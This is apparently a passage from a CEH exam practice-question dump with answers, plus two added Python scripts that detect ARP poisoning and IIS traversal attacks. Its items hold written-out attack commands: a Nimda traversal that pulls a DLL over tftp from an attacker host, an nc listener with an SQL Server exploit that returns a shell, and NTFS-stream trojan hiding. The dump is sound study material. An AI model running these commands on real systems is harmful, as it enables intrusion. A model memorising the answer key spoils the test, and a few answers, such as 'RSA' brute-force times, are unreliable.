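The first hop (137.189.96.52) is the site's own virus wall handing the message to the department server, so it is not the sender; the hop below it was written by the virus wall and names 203.218.39.20, whose reverse DNS (pcd249020.netvigator.com) does not match the claimed HELO mydomain.com.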
A#CEH Q.59 A httpd access_log file shows a WEB-IIS attack from a remote host^  04:47:14 137.68.238.15 GET /scripts/..%5c../winnt/system32/cmd.exe 404^  Which of the following will provide the organization (in full name) that owns the whole IP block of the remote host (i.e. 137.68.0.0 - 137.68.255.255)? (Select the Best Answer)^A.	#whois 137.68.238.15@whois.arin.net^B.	#arin 137.68.238.15^C.	# t u c o w s _ t 1 3 7 . 6 8 . 2 3 8 . 1 5^D.	#dlookup 137.68.238.15@name -l
D#CEH Q.60 Buffer overflow exploit can change the execution flow of a program because: (Select all that apply)^A.	it injects shell code in the stack^B.	it stuffs many 90 NOP code to the stack^C.	it stuffs too many data into local function variables^D.	it overwrites the return address of a call function in the stack
B,C,D#CEH Q.61 Which of the following techniques are used for insertion attack on IDS? (Select all that apply)^A.	Using IP Fragmentation^B.	Using Invalid sequence no.^C.	Using incorrect TCP checksum^D.	Using short TTL^E.	Using non-existent SYN packet flood
A#CEH Q.62 The following are tcpdump packets of an ARP poisoning Man-in-the-Middle (MITM) attack.^  0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61^  0:50:56:47:0:61 0:50:56:47:0:65 42: arp reply ntec9-28 is-at 0:50:56:47:0:61^  0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61^  0:50:56:47:0:61 0:50:56:47:0:65 42: arp reply ntec9-28 is-at 0:50:56:47:0:61^  0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61^  What is the MAC address of the middleman? (Select the Best Answer)^A.	0:50:56:47:0:61^B.	0:50:56:47:0:65^C.	0:50:56:47:0:46
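An added example (not from the original page) that turns the question into a detection rule: a single MAC sending unsolicited ARP replies that claim two different hosts is the poisoning signature, and the destinations of those replies are the victims whose caches now route through it. The input is the five tcpdump lines from the question, embedded as constructed text.

```python
import re
from collections import defaultdict

# The five tcpdump lines from the question, reproduced as constructed input.
ARP_LOG = """\
0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61
0:50:56:47:0:61 0:50:56:47:0:65 42: arp reply ntec9-28 is-at 0:50:56:47:0:61
0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61
0:50:56:47:0:61 0:50:56:47:0:65 42: arp reply ntec9-28 is-at 0:50:56:47:0:61
0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61
"""

# <src MAC> <dst MAC> <frame len>: arp reply <host> is-at <MAC>
ARP_REPLY_RE = re.compile(
    r"^(\S+) (\S+) \d+: arp reply (\S+) is-at (\S+)", re.MULTILINE)


def parse_replies(log):
    """(src_mac, dst_mac, claimed_host, claimed_mac) for every ARP reply."""
    return [m.groups() for m in ARP_REPLY_RE.finditer(log)]


def claims_by_mac(log):
    """Map each MAC to the set of hosts it claims to be."""
    claims = defaultdict(set)
    for _src, _dst, host, mac in parse_replies(log):
        claims[mac].add(host)
    return claims


def suspected_middlemen(log):
    """One MAC answering for more than one host is the poisoning signature."""
    return sorted(mac for mac, hosts in claims_by_mac(log).items()
                  if len(hosts) > 1)


def poisoned_targets(log):
    """Destination MACs that received the forged replies: the two endpoints
    whose ARP caches now point at the attacker for each other's address."""
    bad = set(suspected_middlemen(log))
    return sorted({dst for _src, dst, _host, mac in parse_replies(log)
                   if mac in bad})


if __name__ == "__main__":
    print("middleman:", suspected_middlemen(ARP_LOG))
    print("victims  :", poisoned_targets(ARP_LOG))
```

On a real segment the same logic runs over a live capture with a baseline of legitimate host-to-MAC bindings; the repeated, unrequested replies in the log are the attacker refreshing the victims' caches so the poisoning does not expire.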
C#CEH Q.63 John's department Web site has been hacked. He reviews the Web site logs and discovers the following log entries:^  34.5.67.4 is the IP address of the attacker:^  GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/ c+tftp%20-i%34.5.67.4%20GET%20Admin.dll%20c:\Admin.dll^  Which of the following worms is responsible for this attack? (Select the Best Answer)^A.	Melissa^B.	SQL Slammer^C.	Nimda^D.	Code Red
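An added example (not from the original page) serving both the Q.59 access_log entry and the Q.63 Nimda entry: it decodes the request the way the flawed IIS decoder did, flags paths that climb out of the web root to reach cmd.exe, and pulls the tftp source address out of the Nimda command line. The three log lines are constructed approximations of the page's entries (the timestamp/IP/method/URL/status layout, the properly percent-encoded Nimda query string and the benign third line are assumptions); the lenient-decoder model, which combines a 0xC0 lead byte with the low six bits of the next byte without validating it, is what makes `%c0%2f` read as a slash.

```python
import re
from urllib.parse import unquote_to_bytes, unquote_plus

# Constructed log lines modelled on the entries in Q.59 and Q.63:
# <time> <client IP> <method> <URL> <status>
LOG_LINES = [
    "04:47:14 137.68.238.15 GET /scripts/..%5c../winnt/system32/cmd.exe 404",
    "04:48:02 34.5.67.4 GET /scripts/..%c0%2f../winnt/system32/cmd.exe"
    "?/c+tftp%20-i%2034.5.67.4%20GET%20Admin.dll%20c:\\Admin.dll 200",
    "04:49:00 10.0.0.5 GET /index.html 200",
]

TFTP_RE = re.compile(r"tftp\s+-i\s+(\d{1,3}(?:\.\d{1,3}){3})", re.IGNORECASE)


def iis_lenient_decode(raw):
    """Model of the decoder flaw Nimda relied on: after %XX decoding, a
    two-byte UTF-8 lead byte (0xC0-0xDF) is merged with the low six bits of
    the following byte WITHOUT checking that it is a valid continuation
    byte, so the invalid sequence %c0%2f comes out as '/'."""
    data = unquote_to_bytes(raw)
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        elif b < 0x80:
            out.append(chr(b))
            i += 1
        else:
            out.append("?")      # other non-ASCII bytes are not needed here
            i += 1
    return "".join(out)


def escapes_webroot(path):
    """True if the decoded path climbs above the virtual root.
    Backslashes count as separators, as they do on IIS (hence %5c)."""
    depth = 0
    for part in iis_lenient_decode(path).replace("\\", "/").split("/"):
        if part == "..":
            depth -= 1
            if depth < 0:
                return True
        elif part and part != ".":
            depth += 1
    return False


def analyze(line):
    """Classify one access_log line."""
    _ts, client, _method, url, _status = line.split(maxsplit=4)
    path, _sep, query = url.partition("?")
    decoded_path = iis_lenient_decode(path)
    tftp = TFTP_RE.search(unquote_plus(query))
    return {
        "client": client,
        "traversal": escapes_webroot(path),
        "cmd_exe": "cmd.exe" in decoded_path.lower(),
        "tftp_source": tftp.group(1) if tftp else None,
    }


if __name__ == "__main__":
    for line in LOG_LINES:
        print(analyze(line))
```

The Q.59 line is a plain `..%5c..` (backslash) traversal to cmd.exe; the Q.63 line uses the Unicode form and then drives cmd.exe to fetch Admin.dll over tftp from the attacker's own host, which is the Nimda propagation step.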
C#CEH Q.64 Jack Hacker wants to break into Brown Co.'s computers and obtain their secret double fudge cookie recipe. ^  Jack calls Jane, an accountant at Brown Co., pretending to be an administrator from Brown Co. ^  Jack tells Jane that there has been a problem with some accounts and asks her to tell him her password ''just to double check our records.'' Jane believes that Jack is really an administrator, and tells him her password. Jack now has a user name and password, and can access Brown Co.'s computers, to find the cookie recipe.^  This is an example of what attack? (Select the Best Answer)^A.	Reverse Psychology^B.	Reverse Engineering^C.	Social Engineering^D.	Spoofing Identity^E.	Faking Identity
A#CEH Q.65 On October 7, 2001, NASA suffered massive attacks. Files were taken and employees' directories were invaded. ^  The intruders left methods to regain access to the system, called ''back doors,'' to allow them to reenter at any point in the future. ^  The attackers used a malicious program that disguises itself as a Word document and uses a flaw in the Word program for its attack. ^  Once the file is opened, it can steal log files and passwords. These are then sent back to the originator of the attack. ^  What worm was used for this attack? (Select the Best Answer)^A.	Melissa^B.	Pretty Park^C.	Goga^D.	W32:Klez
B#CEH Q.66 Which of the following correctly describes the IDS evasion tool fragrouter? (Select the Best Answer)^A.	Some IDS can only keep track of one host/port connection at a time. Flood the target port with non-existent SYN packet first so that these IDS ignore the real connection.^B.	IP Fragmentation. By sending out fragment packets out of order, some IDS assume the fragment packets arrive in order. They just reassemble the data as soon as the marked final fragment arrives. Sending out fragment packets out of order may fool the IDS.^C.	Sending overlapping fragment packets. There may be a gap between the IDS and end-point server handling overlapping fragment. If the IDS does not handle overlapping fragments in a manner consistent with the systems it watches, it may reassemble a completely different packet than an end system in receipt of the same fragments.^D.	An end-system can accept a packet that an IDS rejects. An IDS that mistakenly rejects such a packet misses its contents entirely.
B#CEH Q.67 What is the hacking tool WinSSLMiM used for? (Select the Best Answer)^A.	Kills SSL TCP sessions.^B.	Used in Man-in-the-Middle attacks against SSL connections.^C.	Generates fake SSL certificates.^D.	Monitors Windows SSL sessions.
A,B,C#CEH Q.68 The Microsoft SQL Server contains several serious vulnerabilities that allow remote attackers to obtain sensitive information, alter database content, compromise SQL servers, and, in some configurations, compromise server hosts. ^  The SQL Server Resolution Service operates on UDP port 1434 and provides a way for clients to query the appropriate network endpoints to use for a particular SQL Server instance. By sending a carefully crafted packet to the Resolution Service, an attacker could compromise and take over the system. ^  The hacking tool SQL2.EXE is used to launch this attack.^  C:\>nc -l -p 53^  C:\>SQL2.EXE db.target.com 202.202.202.202 53^  Which Microsoft SQL Server 2000 service packs are vulnerable to this exploit? (Select all that apply)^A.	SP0^B.	SP1^C.	SP2^D.	SP3
C#CEH Q.69 Which of the following is a backdoor Dynamic Link Library (DLL) Trojan that is used to attack and exploit IIS servers? If the attack is successful, then the attacker will have gained System-level access to the server. ^  The Trojan DLL needs to be installed in the 'Scripts' directory of the IIS 5.0 machine in order for the exploit to be used. Browsing to the DLL (e.g. http://IIS-server/) enables the hacker to spawn commands remotely (using CMD.EXE). (Select the Best Answer)^A.	IISExploit^B.	Jill-32.dll^C.	IISCrack.dll^D.	IPPExploit.dll
B#CEH Q.70 Which of the following Windows hacking tools is used to hijack Telnet and FTP sessions? (Select the Best Answer)^A.	Hunt^B.	Juggernaut^C.	TTYWatcher^D.	T-Sight
C#CEH Q.71 Take a look at the following command:^  c:\> wtk -p 80 -i 192.168.0.1^  What does the hacking tool WTK do? (Select the Best Answer)^A.	It is a TCP connection killer for Windows 2000.^B.	It is a Windows Trojan Kit (wtk) program that connects to the daemon at 192.168.0.1 using port 80.^C.	It is a Windows Tunneling Kit (wtk) that establishes covert channels to 192.168.0.1 using port 80.^D.	This is a Linux command, which lists services and threads running on 192.168.0.1 at port 80.
C#CEH Q.74 What is the IP address of _rootkit_'s embedded TCP/IP stack? (Select the Best Answer)^A.	192.168.0.78^B.	172.8.0.1^C.	10.0.0.166^D.	204.187.7.99
C#CEH Q.75 You have successfully compromised MommaCookie's computer in the MommaCookie.com domain. You have escalated your privileges to the level of an Administrator and planted a virus. You would like to cover your tracks by selectively erasing operating system log entries. Which tool will you use? (Select the Best Answer)^A.	Auditpol.exe^B.	Elslave.exe^C.	WinZapper^D.	Evidence Eliminator
D#CEH Q.76 Which of the following is a steganographic program that is used to conceal messages in ASCII text by appending whitespace to the end of lines in a text file? (Select the Best Answer)^A.	Camera/Shy^B.	ImageHide^C.	WhiteSpacer^D.	Snow
B#CEH Q.77 What is Restorator? (Select the Best Answer)^A.	Restorator is a hacking tool which records keystrokes on a victim's computer.^B.	Restorator is a hacking tool which allows you to modify the user interface of any Win32 program by creating your own UCAs.^C.	Restorator is an advanced EXE wrapper for Windows 2K, which is used for SFX archiving and for secretly installing and running programs.^D.	It is a BackOrifice plug-in tool which extends BO2K functionality.
D#CEH Q.78 Which of the following is an ARP spoofing tool that is part of dsniff? (Select the Best Answer)^A.	Webspy^B.	URLSnarf^C.	Arpsniff^D.	Macof
B#CEH Q.79 Which of the following is a MAC address modifying utility which allows users to change the MAC address of almost any Network Interface Card (NIC) on Windows 2000 and XP systems? (Select the Best Answer)^A.	Macof^B.	Smac^C.	Mac Changer^D.	Arpper
B#CEH Q.80 Take a look at the following command:^  c:\> wds -n www.mikegolds.com -I 4.6.7.8 -g 00-00-39-5c-45-3b^  What does the hacking tool wds do? (Select the Best Answer)^A.	It retrieves DNS records from the ARIN database for the domain www.mikegolds.com^B.	It spoofs the DNS domain name www.mikegolds.com to the IP address 4.6.7.8^C.	It poisons the MAC address located at 4.6.7.8 with 00-00-39-5c-45-3b^D.	It hijacks TCP sessions originating from www.mikegolds.com to the attacker's machine located at 4.6.7.8
C#CEH Q.81 Which of the following is a Linux-based sniffer detection tool? (Select the Best Answer)^A.	WinSniffer^B.	SniffDet^C.	Ethereal^D.	Ettercap
D#CEH Q.82 You launch Nmap targeting the domain http://www.furnituremill.com.^  Port 		State 		Service^  21/tcp 		open 		ftp^  80/tcp 		open 		http^  135/tcp 		open 		loc-srv^  139/tcp 		open 		netbios-ssn^  443/tcp 		open 		https^  1031/tcp 	open 		iads^  From the above output, you notice that port 139 is open. What hacking tool will you use to download a list of shares and usernames from the domain http://www.furnituremill.com, assuming you can connect through null sessions? (Select the Best Answer)^A.	SMBRelay^B.	SMBDump^C.	User2Sid^D.	DumpSec
B#CEH Q.84 Which of the following tools will you use to bypass a firewall that blocks all ports except ICMP? (Select all that apply)^A.	HTTP Reverse Shell^B.	Loki^C.	HTTP Tunnel^D.	007Shell
B#CEH Q.85 How long will it take to crack a 40-bit RSA key using a single Pentium 4 (2.4 GHz) computer in a brute-force attack? (Select the Best Answer)^A.	1.4 seconds^B.	1.4 minutes^C.	73 days^D.	50 years^E.	10 to the power 20 years
C#CEH Q.86 How long will it take to crack a 56-bit RSA key using a single Pentium 4 (2.4 GHz) computer in a brute-force attack? (Select the Best Answer)^A.	1.4 seconds^B.	1.4 minutes^C.	73 days^D.	50 years^E.	10 to the power 20 years
E#CEH Q.87 How long will it take to crack a 128-bit RSA key using a single Pentium 4 (2.4 GHz) computer in a brute-force attack? (Select the Best Answer)^A.	1.4 seconds^B.	1.4 minutes^C.	73 days^D.	50 years^E.	10 to the power 20 years
A,B,D,E#CEH Q.86 Buffer overflow vulnerabilities are due to applications that do not perform bounds checks in the code. Which of the following C/C++ functions do not perform bounds checks? (Select all that apply)^A.	gets()^B.	memcpy()^C.	strcpy()^D.	scanf()^E.	strcat()
D#CEH Q.88 How long will it take to crack a 64-bit RSA key using a single Pentium 4 (2.4 GHz) computer in a brute-force attack? (Select the Best Answer)^A.	1.4 seconds^B.	1.4 minutes^C.	73 days^D.	50 years^E.	10 to the power 20 years
C#CEH Q.89 You have hidden a Trojan file virus.exe inside the file abc.txt using NTFS streaming. Which command would you execute to extract the Trojan to a standalone file? (Select the Best Answer)^A.	c:\> type abc.txt:virus.exe > virus.exe^B.	c:\> more abc.txt|virus.exe > virus.exe^C.	c:\> cat abc.txt:virus.exe > virus.exe^D.	c:\> list abc.txt$virus.exe > virus.exe